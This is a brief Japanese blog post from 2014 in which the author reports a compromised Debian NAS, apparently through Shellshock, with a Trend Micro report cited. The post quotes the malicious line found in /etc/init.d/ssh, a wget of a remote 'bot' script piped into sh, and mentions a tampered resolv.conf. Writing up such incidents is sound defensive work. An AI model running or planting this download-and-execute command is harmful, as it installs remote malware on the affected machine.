5th Oct 2014
NASがやられた。Debian wheezy amd64。
/etc/init.d/ssh
RAID修復メンテナンスの時に再起動したらsshdが立ち上がらなくなっていた。
不審に思って /etc/init.d/ssh を確認。
wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh
なにこれは。幸いwgetが失敗して/tmp/shが作成されず無事だった。
resolve.conf
書き換えられたファイルはこの二つ。
火壁 (pfSense) のおかげで特に大事には至っていないようだ。
参考情報
- この件に関してトレンドマイクロよりレポートが出ています → 日本への「Shellshock」脆弱性攻撃、その攻撃内容を詳細解析